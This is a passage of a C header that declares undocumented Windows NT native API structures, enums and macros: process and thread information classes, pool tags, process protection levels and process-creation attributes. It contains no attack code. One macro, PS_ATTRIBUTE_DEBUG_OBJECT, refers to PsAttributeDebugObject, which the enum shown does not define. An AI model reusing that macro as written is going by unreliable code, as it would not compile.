SessionId;\n ULONG_PTR UniqueProcessKey;\n VM_COUNTERS VmCounters;\n IO_COUNTERS IoCounters;\n SYSTEM_THREAD_INFORMATION Threads[1]; //not a part of this structure\n} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;\n\ntypedef enum _SYSTEM_PROCESS_CLASSIFICATION {\n SystemProcessClassificationNormal,\n SystemProcessClassificationSystem,\n SystemProcessClassificationSecureSystem,\n SystemProcessClassificationMemCompression,\n SystemProcessClassificationRegistry,\n SystemProcessClassificationMaximum\n} SYSTEM_PROCESS_CLASSIFICATION;\n\ntypedef struct _PROCESS_DISK_COUNTERS {\n ULONGLONG BytesRead;\n ULONGLONG BytesWritten;\n ULONGLONG ReadOperationCount;\n ULONGLONG WriteOperationCount;\n ULONGLONG FlushOperationCount;\n} PROCESS_DISK_COUNTERS, *PPROCESS_DISK_COUNTERS;\n\ntypedef union _ENERGY_STATE_DURATION {\n union\n {\n ULONGLONG Value;\n ULONG LastChangeTime;\n };\n\n ULONG Duration : 31;\n ULONG IsInState : 1;\n} ENERGY_STATE_DURATION, *PENERGY_STATE_DURATION;\n\ntypedef struct _PROCESS_ENERGY_VALUES {\n ULONGLONG Cycles[2][4];\n ULONGLONG DiskEnergy;\n ULONGLONG NetworkTailEnergy;\n ULONGLONG MBBTailEnergy;\n ULONGLONG NetworkTxRxBytes;\n ULONGLONG MBBTxRxBytes;\n union\n {\n ENERGY_STATE_DURATION Durations[3];\n struct\n {\n ENERGY_STATE_DURATION ForegroundDuration;\n ENERGY_STATE_DURATION DesktopVisibleDuration;\n ENERGY_STATE_DURATION PSMForegroundDuration;\n };\n };\n ULONG CompositionRendered;\n ULONG CompositionDirtyGenerated;\n ULONG CompositionDirtyPropagated;\n ULONG Reserved1;\n ULONGLONG AttributedCycles[4][2];\n ULONGLONG WorkOnBehalfCycles[4][2];\n} PROCESS_ENERGY_VALUES, *PPROCESS_ENERGY_VALUES;\n\ntypedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION {\n PROCESS_DISK_COUNTERS DiskCounters;\n ULONGLONG ContextSwitches;\n union\n {\n ULONG Flags;\n struct\n {\n ULONG HasStrongId : 1;\n ULONG Classification : 4; // SYSTEM_PROCESS_CLASSIFICATION\n ULONG BackgroundActivityModerated : 1;\n ULONG Spare : 26;\n };\n };\n ULONG UserSidOffset;\n ULONG PackageFullNameOffset;\n PROCESS_ENERGY_VALUES EnergyValues;\n ULONG AppIdOffset;\n SIZE_T SharedCommitCharge;\n ULONG JobObjectId;\n ULONG SpareUlong;\n ULONGLONG ProcessSequenceNumber;\n} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION;\n\ntypedef struct _SYSTEM_PROCESS_FULL_INFORMATION {\n SYSTEM_PROCESS_INFORMATION ProcessAndThreads;\n SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo;\n} SYSTEM_PROCESS_FULL_INFORMATION, *PSYSTEM_PROCESS_FULL_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESS_ID_INFORMATION {\n HANDLE ProcessId;\n UNICODE_STRING ImageName;\n} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION;\n\ntypedef struct _SYSTEM_SECUREBOOT_INFORMATION {\n BOOLEAN SecureBootEnabled;\n BOOLEAN SecureBootCapable;\n} SYSTEM_SECUREBOOT_INFORMATION, *PSYSTEM_SECUREBOOT_INFORMATION;\n\ntypedef struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION {\n GUID PolicyPublisher;\n ULONG PolicyVersion;\n ULONG PolicyOptions;\n} SYSTEM_SECUREBOOT_POLICY_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_INFORMATION;\n\ntypedef struct _SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION {\n SYSTEM_SECUREBOOT_POLICY_INFORMATION PolicyInformation;\n ULONG PolicySize;\n UCHAR Policy[1];\n} SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION;\n\ntypedef struct _SYSTEM_BASIC_INFORMATION {\n ULONG Reserved;\n ULONG TimerResolution;\n ULONG PageSize;\n ULONG NumberOfPhysicalPages;\n ULONG LowestPhysicalPageNumber;\n ULONG HighestPhysicalPageNumber;\n ULONG AllocationGranularity;\n ULONG_PTR MinimumUserModeAddress;\n ULONG_PTR MaximumUserModeAddress;\n ULONG_PTR ActiveProcessorsAffinityMask;\n CCHAR NumberOfProcessors;\n} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;\n\ntypedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {\n BOOLEAN SecureKernelRunning : 1;\n BOOLEAN HvciEnabled : 1;\n BOOLEAN HvciStrictMode : 1;\n BOOLEAN DebugEnabled : 1;\n BOOLEAN FirmwarePageProtection : 1;\n BOOLEAN EncryptionKeyAvailable : 1;\n BOOLEAN SpareFlags : 2;\n BOOLEAN TrustletRunning : 1;\n BOOLEAN HvciDisableAllowed : 1;\n BOOLEAN HardwareEnforcedVbs : 1;\n BOOLEAN NoSecrets : 1;\n BOOLEAN EncryptionKeyPersistent : 1;\n BOOLEAN HardwareEnforcedHvpt : 1;\n BOOLEAN HardwareHvptAvailable : 1;\n BOOLEAN SpareFlags2 : 1;\n BOOLEAN Spare0[6];\n ULONGLONG Spare1;\n} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESSOR_FEATURES_INFORMATION { //chappell\n ULONGLONG ProcessorFeatureBits;\n ULONGLONG Reserved[3];\n} SYSTEM_PROCESSOR_FEATURES_INFORMATION, * PSYSTEM_PROCESSOR_FEATURES_INFORMATION;\n\ntypedef struct _SYSTEM_POOL_ENTRY {\n BOOLEAN Allocated;\n BOOLEAN Spare0;\n USHORT AllocatorBackTraceIndex;\n ULONG Size;\n union {\n UCHAR Tag[4];\n ULONG TagUlong;\n PVOID ProcessChargedQuota;\n };\n} SYSTEM_POOL_ENTRY, * PSYSTEM_POOL_ENTRY;\n\ntypedef struct _SYSTEM_POOL_INFORMATION {\n SIZE_T TotalSize;\n PVOID FirstEntry;\n USHORT EntryOverhead;\n BOOLEAN PoolTagPresent;\n BOOLEAN Spare0;\n ULONG NumberOfEntries;\n SYSTEM_POOL_ENTRY Entries[1];\n} SYSTEM_POOL_INFORMATION, * PSYSTEM_POOL_INFORMATION;\n\ntypedef struct _SYSTEM_POOLTAG {\n union {\n UCHAR Tag[4];\n ULONG TagUlong;\n };\n ULONG PagedAllocs;\n ULONG PagedFrees;\n SIZE_T PagedUsed;\n ULONG NonPagedAllocs;\n ULONG NonPagedFrees;\n SIZE_T NonPagedUsed;\n} SYSTEM_POOLTAG, * PSYSTEM_POOLTAG;\n\ntypedef struct _SYSTEM_BIGPOOL_ENTRY {\n union {\n PVOID VirtualAddress;\n ULONG_PTR NonPaged : 1;\n };\n SIZE_T SizeInBytes;\n union {\n UCHAR Tag[4];\n ULONG TagUlong;\n };\n} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;\n\ntypedef struct _SYSTEM_POOLTAG_INFORMATION {\n ULONG Count;\n SYSTEM_POOLTAG TagInfo[1];\n} SYSTEM_POOLTAG_INFORMATION, * PSYSTEM_POOLTAG_INFORMATION;\n\ntypedef struct _SYSTEM_SESSION_POOLTAG_INFORMATION {\n SIZE_T NextEntryOffset;\n ULONG SessionId;\n ULONG Count;\n SYSTEM_POOLTAG TagInfo[1];\n} SYSTEM_SESSION_POOLTAG_INFORMATION, * PSYSTEM_SESSION_POOLTAG_INFORMATION;\n\ntypedef struct _SYSTEM_BIGPOOL_INFORMATION {\n ULONG Count;\n SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];\n} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;\n\ntypedef struct _SYSTEM_FIRMWARE_PARTITION_INFORMATION {\n UNICODE_STRING FirmwarePartition; // \\Device\\HarddiskX\n} SYSTEM_FIRMWARE_PARTITION_INFORMATION, * PSYSTEM_FIRMWARE_PARTITION_INFORMATION;\n\ntypedef struct _RTL_PROCESS_BACKTRACE_INFORMATION {\n PCHAR SymbolicBackTrace;\n ULONG TraceCount;\n USHORT Index;\n USHORT Depth;\n PVOID BackTrace[32];\n} RTL_PROCESS_BACKTRACE_INFORMATION, * PRTL_PROCESS_BACKTRACE_INFORMATION;\n\ntypedef struct _RTL_PROCESS_BACKTRACES {\n ULONG CommittedMemory;\n ULONG ReservedMemory;\n ULONG NumberOfBackTraceLookups;\n ULONG NumberOfBackTraces;\n RTL_PROCESS_BACKTRACE_INFORMATION BackTraces[1];\n} RTL_PROCESS_BACKTRACES, * PRTL_PROCESS_BACKTRACES;\n\ntypedef enum _PROCESSINFOCLASS {\n ProcessBasicInformation = 0,\n ProcessQuotaLimits = 1,\n ProcessIoCounters = 2,\n ProcessVmCounters = 3,\n ProcessTimes = 4,\n ProcessBasePriority = 5,\n ProcessRaisePriority = 6,\n ProcessDebugPort = 7,\n ProcessExceptionPort = 8,\n ProcessAccessToken = 9,\n ProcessLdtInformation = 10,\n ProcessLdtSize = 11,\n ProcessDefaultHardErrorMode = 12,\n ProcessIoPortHandlers = 13,\n ProcessPooledUsageAndLimits = 14,\n ProcessWorkingSetWatch = 15,\n ProcessUserModeIOPL = 16,\n ProcessEnableAlignmentFaultFixup = 17,\n ProcessPriorityClass = 18,\n ProcessWx86Information = 19,\n ProcessHandleCount = 20,\n ProcessAffinityMask = 21,\n ProcessPriorityBoost = 22,\n ProcessDeviceMap = 23,\n ProcessSessionInformation = 24,\n ProcessForegroundInformation = 25,\n ProcessWow64Information = 26,\n ProcessImageFileName = 27,\n ProcessLUIDDeviceMapsEnabled = 28,\n ProcessBreakOnTermination = 29,\n ProcessDebugObjectHandle = 30,\n ProcessDebugFlags = 31,\n ProcessHandleTracing = 32,\n ProcessIoPriority = 33,\n ProcessExecuteFlags = 34,\n ProcessTlsInformation = 35,\n ProcessCookie = 36,\n ProcessImageInformation = 37,\n ProcessCycleTime = 38,\n ProcessPagePriority = 39,\n ProcessInstrumentationCallback = 40,\n ProcessThreadStackAllocation = 41,\n ProcessWorkingSetWatchEx = 42,\n ProcessImageFileNameWin32 = 43,\n ProcessImageFileMapping = 44,\n ProcessAffinityUpdateMode = 45,\n ProcessMemoryAllocationMode = 46,\n ProcessGroupInformation = 47,\n ProcessTokenVirtualizationEnabled = 48,\n ProcessConsoleHostProcess = 49, //ProcessOwnerInformation\n ProcessWindowInformation = 50,\n ProcessHandleInformation = 51,\n ProcessMitigationPolicy = 52,\n ProcessDynamicFunctionTableInformation = 53,\n ProcessHandleCheckingMode = 54,\n ProcessKeepAliveCount = 55,\n ProcessRevokeFileHandles = 56,\n ProcessWorkingSetControl = 57,\n ProcessHandleTable = 58,\n ProcessCheckStackExtentsMode = 59,\n ProcessCommandLineInformation = 60,\n ProcessProtectionInformation = 61,\n ProcessMemoryExhaustion = 62,\n ProcessFaultInformation = 63,\n ProcessTelemetryIdInformation = 64,\n ProcessCommitReleaseInformation = 65,\n ProcessDefaultCpuSetsInformation = 66,\n ProcessAllowedCpuSetsInformation = 67,\n ProcessSubsystemProcess = 68,\n ProcessJobMemoryInformation = 69,\n ProcessInPrivate = 70,\n ProcessRaiseUMExceptionOnInvalidHandleClose = 71,\n ProcessIumChallengeResponse = 72,\n ProcessChildProcessInformation = 73,\n ProcessHighGraphicsPriorityInformation = 74,\n ProcessSubsystemInformation = 75,\n ProcessEnergyValues = 76,\n ProcessActivityThrottleState = 77,\n ProcessActivityThrottlePolicy = 78,\n ProcessWin32kSyscallFilterInformation = 79,\n ProcessDisableSystemAllowedCpuSets = 80,\n ProcessWakeInformation = 81,\n ProcessEnergyTrackingState = 82,\n ProcessManageWritesToExecutableMemory = 83,\n ProcessCaptureTrustletLiveDump = 84,\n ProcessTelemetryCoverage = 85,\n ProcessEnclaveInformation = 86,\n ProcessEnableReadWriteVmLogging = 87,\n ProcessUptimeInformation = 88,\n ProcessImageSection = 89,\n ProcessDebugAuthInformation = 90,\n ProcessSystemResourceManagement = 91,\n ProcessSequenceNumber = 92,\n ProcessLoaderDetour = 93,\n ProcessSecurityDomainInformation = 94,\n ProcessCombineSecurityDomainsInformation = 95,\n ProcessEnableLogging = 96,\n ProcessLeapSecondInformation = 97,\n ProcessFiberShadowStackAllocation = 98,\n ProcessFreeFiberShadowStackAllocation = 99,\n ProcessAltSystemCallInformation = 100,\n ProcessDynamicEHContinuationTargets = 101,\n ProcessDynamicEnforcedCetCompatibleRanges = 102,\n ProcessCreateStateChange = 103,\n ProcessApplyStateChange = 104,\n ProcessEnableOptionalXStateFeatures = 105,\n ProcessAltPrefetchParam = 106,\n ProcessAssignCpuPartitions = 107,\n ProcessPriorityClassEx = 108,\n ProcessMembershipInformation = 109,\n ProcessEffectiveIoPriority = 110,\n ProcessEffectivePagePriority = 111,\n ProcessSchedulerSharedData = 112,\n ProcessSlistRollbackInformation = 113,\n ProcessNetworkIoCounters = 114,\n ProcessFindFirstThreadByTebValue = 115,\n ProcessEnclaveAddressSpaceRestriction = 116,\n ProcessAvailableCpus = 117,\n MaxProcessInfoClass\n} PROCESSINFOCLASS;\n\ntypedef enum _THREADINFOCLASS {\n ThreadBasicInformation,\n ThreadTimes,\n ThreadPriority,\n ThreadBasePriority,\n ThreadAffinityMask,\n ThreadImpersonationToken,\n ThreadDescriptorTableEntry,\n ThreadEnableAlignmentFaultFixup,\n ThreadEventPair,\n ThreadQuerySetWin32StartAddress,\n ThreadZeroTlsCell,\n ThreadPerformanceCount,\n ThreadAmILastThread,\n ThreadIdealProcessor,\n ThreadPriorityBoost,\n ThreadSetTlsArrayAddress,\n ThreadIsIoPending,\n ThreadHideFromDebugger,\n ThreadBreakOnTermination,\n ThreadSwitchLegacyState,\n ThreadIsTerminated,\n ThreadLastSystemCall,\n ThreadIoPriority,\n ThreadCycleTime,\n ThreadPagePriority,\n ThreadActualBasePriority,\n ThreadTebInformation,\n ThreadCSwitchMon,\n ThreadCSwitchPmu,\n ThreadWow64Context,\n ThreadGroupInformation,\n ThreadUmsInformation,\n ThreadCounterProfiling,\n ThreadIdealProcessorEx,\n ThreadCpuAccountingInformation,\n ThreadSuspendCount,\n ThreadHeterogeneousCpuPolicy,\n ThreadContainerId,\n ThreadNameInformation,\n ThreadSelectedCpuSets,\n ThreadSystemThreadInformation,\n ThreadActualGroupAffinity,\n ThreadDynamicCodePolicyInfo,\n ThreadExplicitCaseSensitivity,\n ThreadWorkOnBehalfTicket,\n ThreadSubsystemInformation,\n ThreadDbgkWerReportActive,\n ThreadAttachContainer,\n ThreadManageWritesToExecutableMemory,\n ThreadPowerThrottlingState,\n ThreadWorkloadClass,\n ThreadCreateStateChange,\n ThreadApplyStateChange,\n ThreadStrongerBadHandleChecks,\n ThreadEffectiveIoPriority,\n ThreadEffectivePagePriority,\n ThreadUpdateLockOwnership,\n ThreadSchedulerSharedDataSlot,\n ThreadTebInformationAtomic,\n ThreadIndexInformation,\n MaxThreadInfoClass\n} THREADINFOCLASS;\n\ntypedef struct _PROCESS_BASIC_INFORMATION {\n NTSTATUS ExitStatus;\n PVOID PebBaseAddress;\n ULONG_PTR AffinityMask;\n KPRIORITY BasePriority;\n ULONG_PTR UniqueProcessId;\n ULONG_PTR InheritedFromUniqueProcessId;\n} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;\n\ntypedef struct _THREAD_BASIC_INFORMATION {\n NTSTATUS ExitStatus;\n PVOID TebBaseAddress;\n CLIENT_ID ClientId;\n ULONG_PTR AffinityMask;\n KPRIORITY Priority;\n LONG BasePriority;\n} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;\n\n// taken from ph2(whatever)\ntypedef struct _THREAD_LAST_SYSCALL_INFORMATION {\n PVOID FirstArgument;\n USHORT SystemCallNumber;\n#ifdef WIN64\n USHORT Pad[0x3]; // since REDSTONE2\n#else\n USHORT Pad[0x1]; // since REDSTONE2\n#endif\n ULONG64 WaitTime;\n} THREAD_LAST_SYSCALL_INFORMATION, * PTHREAD_LAST_SYSCALL_INFORMATION;\n\ntypedef struct _THREAD_NAME_INFORMATION {\n UNICODE_STRING ThreadName;\n} THREAD_NAME_INFORMATION, * PTHREAD_NAME_INFORMATION;\n\ntypedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {\n SIZE_T Size;\n PROCESS_BASIC_INFORMATION BasicInfo;\n union\n {\n ULONG Flags;\n struct\n {\n ULONG IsProtectedProcess : 1;\n ULONG IsWow64Process : 1;\n ULONG IsProcessDeleting : 1;\n ULONG IsCrossSessionCreate : 1;\n ULONG IsFrozen : 1;\n ULONG IsBackground : 1;\n ULONG IsStronglyNamed : 1;\n ULONG IsSecureProcess : 1;\n ULONG IsSubsystemProcess : 1;\n ULONG SpareBits : 23;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;\n\ntypedef struct _PROCESS_ACCESS_TOKEN {\n HANDLE Token;\n HANDLE Thread;\n} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;\n\ntypedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {\n HANDLE HandleValue;\n ULONG_PTR HandleCount;\n ULONG_PTR PointerCount;\n ULONG GrantedAccess;\n ULONG ObjectTypeIndex;\n ULONG HandleAttributes;\n ULONG Reserved;\n} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;\n\ntypedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {\n ULONG_PTR NumberOfHandles;\n ULONG_PTR Reserved;\n PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];\n} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;\n\ntypedef enum _PROCESS_STATE_CHANGE_TYPE {\n ProcessStateChangeSuspend,\n ProcessStateChangeResume,\n ProcessStateChangeMax,\n} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;\n\ntypedef enum _THREAD_STATE_CHANGE_TYPE {\n ThreadStateChangeSuspend,\n ThreadStateChangeResume,\n ThreadStateChangeMax,\n} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;\n\n//\n// Process/Thread System and User Time\n// NtQueryInformationProcess using ProcessTimes\n// NtQueryInformationThread using ThreadTimes\n//\ntypedef struct _KERNEL_USER_TIMES {\n LARGE_INTEGER CreateTime;\n LARGE_INTEGER ExitTime;\n LARGE_INTEGER KernelTime;\n LARGE_INTEGER UserTime;\n} KERNEL_USER_TIMES, *PKERNEL_USER_TIMES;\n\ntypedef enum _PS_MITIGATION_OPTION {\n PS_MITIGATION_OPTION_NX,\n PS_MITIGATION_OPTION_SEHOP,\n PS_MITIGATION_OPTION_FORCE_RELOCATE_IMAGES,\n PS_MITIGATION_OPTION_HEAP_TERMINATE,\n PS_MITIGATION_OPTION_BOTTOM_UP_ASLR,\n PS_MITIGATION_OPTION_HIGH_ENTROPY_ASLR,\n PS_MITIGATION_OPTION_STRICT_HANDLE_CHECKS,\n PS_MITIGATION_OPTION_WIN32K_SYSTEM_CALL_DISABLE,\n PS_MITIGATION_OPTION_EXTENSION_POINT_DISABLE,\n PS_MITIGATION_OPTION_PROHIBIT_DYNAMIC_CODE,\n PS_MITIGATION_OPTION_CONTROL_FLOW_GUARD,\n PS_MITIGATION_OPTION_BLOCK_NON_MICROSOFT_BINARIES,\n PS_MITIGATION_OPTION_FONT_DISABLE,\n PS_MITIGATION_OPTION_IMAGE_LOAD_NO_REMOTE,\n PS_MITIGATION_OPTION_IMAGE_LOAD_NO_LOW_LABEL,\n PS_MITIGATION_OPTION_IMAGE_LOAD_PREFER_SYSTEM32,\n PS_MITIGATION_OPTION_RETURN_FLOW_GUARD,\n PS_MITIGATION_OPTION_LOADER_INTEGRITY_CONTINUITY,\n PS_MITIGATION_OPTION_STRICT_CONTROL_FLOW_GUARD,\n PS_MITIGATION_OPTION_RESTRICT_SET_THREAD_CONTEXT,\n PS_MITIGATION_OPTION_ROP_STACKPIVOT,\n PS_MITIGATION_OPTION_ROP_CALLER_CHECK,\n PS_MITIGATION_OPTION_ROP_SIMEXEC,\n PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER,\n PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER_PLUS,\n PS_MITIGATION_OPTION_RESTRICT_CHILD_PROCESS_CREATION,\n PS_MITIGATION_OPTION_IMPORT_ADDRESS_FILTER,\n PS_MITIGATION_OPTION_MODULE_TAMPERING_PROTECTION,\n PS_MITIGATION_OPTION_RESTRICT_INDIRECT_BRANCH_PREDICTION,\n PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE,\n PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY,\n PS_MITIGATION_OPTION_CET_SHADOW_STACKS,\n PS_MITIGATION_OPTION_USER_CET_SET_CONTEXT_IP_VALIDATION,\n PS_MITIGATION_OPTION_BLOCK_NON_CET_BINARIES,\n PS_MITIGATION_OPTION_CET_DYNAMIC_APIS_OUT_OF_PROC_ONLY,\n PS_MITIGATION_OPTION_REDIRECTION_TRUST,\n PS_MITIGATION_OPTION_RESTRICT_CORE_SHARING,\n PS_MITIGATION_OPTION_FSCTL_SYSTEM_CALL_DISABLE\n} PS_MITIGATION_OPTION;\n\ntypedef enum _PS_CREATE_STATE {\n PsCreateInitialState,\n PsCreateFailOnFileOpen,\n PsCreateFailOnSectionCreate,\n PsCreateFailExeFormat,\n PsCreateFailMachineMismatch,\n PsCreateFailExeName,\n PsCreateSuccess,\n PsCreateMaximumStates\n} PS_CREATE_STATE;\n\ntypedef struct _PS_CREATE_INFO {\n SIZE_T Size;\n PS_CREATE_STATE State;\n union\n {\n struct\n {\n union\n {\n ULONG InitFlags;\n struct\n {\n UCHAR WriteOutputOnExit : 1;\n UCHAR DetectManifest : 1;\n UCHAR IFEOSkipDebugger : 1;\n UCHAR IFEODoNotPropagateKeyState : 1;\n UCHAR SpareBits1 : 4;\n UCHAR SpareBits2 : 8;\n USHORT ProhibitedImageCharacteristics : 16;\n };\n };\n ACCESS_MASK AdditionalFileAccess;\n } InitState;\n\n struct\n {\n HANDLE FileHandle;\n } FailSection;\n\n struct\n {\n USHORT DllCharacteristics;\n } ExeFormat;\n\n struct\n {\n HANDLE IFEOKey;\n } ExeName;\n\n struct\n {\n union\n {\n ULONG OutputFlags;\n struct\n {\n UCHAR ProtectedProcess : 1;\n UCHAR AddressSpaceOverride : 1;\n UCHAR DevOverrideEnabled : 1;\n UCHAR ManifestDetected : 1;\n UCHAR ProtectedProcessLight : 1;\n UCHAR SpareBits1 : 3;\n UCHAR SpareBits2 : 8;\n USHORT SpareBits3 : 16;\n };\n };\n HANDLE FileHandle;\n HANDLE SectionHandle;\n ULONGLONG UserProcessParametersNative;\n ULONG UserProcessParametersWow64;\n ULONG CurrentParameterFlags;\n ULONGLONG PebAddressNative;\n ULONG PebAddressWow64;\n ULONGLONG ManifestAddress;\n ULONG ManifestSize;\n } SuccessState;\n };\n} PS_CREATE_INFO, *PPS_CREATE_INFO;\n\ntypedef struct _PS_ATTRIBUTE {\n ULONG Attribute;\n SIZE_T Size;\n union\n {\n ULONG Value;\n PVOID ValuePtr;\n };\n PSIZE_T ReturnLength;\n} PS_ATTRIBUTE, *PPS_ATTRIBUTE;\n\ntypedef struct _PS_ATTRIBUTE_LIST {\n SIZE_T TotalLength;\n PS_ATTRIBUTE Attributes[1];\n} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;\n\ntypedef enum _PS_PROTECTED_TYPE {\n PsProtectedTypeNone,\n PsProtectedTypeProtectedLight,\n PsProtectedTypeProtected,\n PsProtectedTypeMax\n} PS_PROTECTED_TYPE;\n\ntypedef enum _PS_PROTECTED_SIGNER {\n PsProtectedSignerNone,\n PsProtectedSignerAuthenticode,\n PsProtectedSignerCodeGen,\n PsProtectedSignerAntimalware,\n PsProtectedSignerLsa,\n PsProtectedSignerWindows,\n PsProtectedSignerWinTcb,\n PsProtectedSignerWinSystem,\n PsProtectedSignerApp,\n PsProtectedSignerMax\n} PS_PROTECTED_SIGNER;\n\n#define PS_PROTECTED_SIGNER_MASK 0xFF\n#define PS_PROTECTED_AUDIT_MASK 0x08\n#define PS_PROTECTED_TYPE_MASK 0x07\n\n// from ph2\n#define PsProtectedValue(aSigner, aAudit, aType) ( \\\n (((aSigner) & PS_PROTECTED_SIGNER_MASK) << 4) | \\\n (((aAudit) & PS_PROTECTED_AUDIT_MASK) << 3) | \\\n ((aType) & PS_PROTECTED_TYPE_MASK)\\\n )\n\n#define InitializePsProtection(aProtectionLevelPtr, aSigner, aAudit, aType) { \\\n (aProtectionLevelPtr)->Signer = aSigner; \\\n (aProtectionLevelPtr)->Audit = aAudit; \\\n (aProtectionLevelPtr)->Type = aType; \\\n }\n\ntypedef struct _PS_PROTECTION {\n union\n {\n UCHAR Level;\n struct\n {\n UCHAR Type : 3;\n UCHAR Audit : 1;\n UCHAR Signer : 4;\n };\n };\n} PS_PROTECTION, *PPS_PROTECTION;\n\n// begin_rev\n#define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff\n#define PS_ATTRIBUTE_THREAD 0x00010000 \n#define PS_ATTRIBUTE_INPUT 0x00020000 \n#define PS_ATTRIBUTE_ADDITIVE 0x00040000 \n// end_rev\n\ntypedef enum _PS_ATTRIBUTE_NUM {\n PsAttributeParentProcess,\n PsAttributeDebugPort,\n PsAttributeToken,\n PsAttributeClientId,\n PsAttributeTebAddress,\n PsAttributeImageName,\n PsAttributeImageInfo,\n PsAttributeMemoryReserve,\n PsAttributePriorityClass,\n PsAttributeErrorMode,\n PsAttributeStdHandleInfo,\n PsAttributeHandleList,\n PsAttributeGroupAffinity,\n PsAttributePreferredNode,\n PsAttributeIdealProcessor,\n PsAttributeUmsThread,\n PsAttributeMitigationOptions,\n PsAttributeProtectionLevel,\n PsAttributeSecureProcess,\n PsAttributeJobList,\n PsAttributeChildProcessPolicy,\n PsAttributeAllApplicationPackagesPolicy,\n PsAttributeWin32kFilter,\n PsAttributeSafeOpenPromptOriginClaim,\n PsAttributeBnoIsolation,\n PsAttributeDesktopAppPolicy,\n PsAttributeChpe,\n PsAttributeMitigationAuditOptions,\n PsAttributeMachineType,\n PsAttributeComponentFilter,\n PsAttributeEnableOptionalXStateFeatures,\n PsAttributeSupportedMachines,\n PsAttributeSveVectorLength,\n PsAttributeMax\n} PS_ATTRIBUTE_NUM;\n\n#define PsAttributeValue(Number, Thread, Input, Unknown) \\\n (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \\\n ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \\\n ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \\\n ((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0))\n\n#define PS_ATTRIBUTE_PARENT_PROCESS \\\n PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_DEBUG_OBJECT \\\n PsAttributeValue(PsAttributeDebugObject, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_TOKEN \\\n PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)\n#define PS_ATTRIBUTE_CLIENT_ID \\\n PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)\n#define PS_ATTRIBUTE_TEB_ADDRESS \\\n PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)\n#define PS_ATTRIBUTE_IMAGE_NAME \\\n PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_IMAGE_INFO \\\n PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)\n#define PS_ATTRIBUTE_MEMORY_RESERVE \\\n PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_PRIORITY_CLASS \\\n PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_ERROR_MODE \\\n PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_STD_HANDLE_INFO \\\n PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_HANDLE_LIST \\\n PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_GROUP_AFFINITY \\\n PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)\n#define PS_ATTRIBUTE_PREFERRED_NODE \\\n PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_IDEAL_PROCESSOR \\\n PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)\n#define PS_ATTRIBUTE_UMS_THREAD \\\n PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)\n#define PS_ATTRIBUTE_MITIGATION_OPTIONS \\\n PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE)\n#define PS_ATTRIBUTE_PROTECTION_LEVEL \\\n PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, TRUE)\n#define 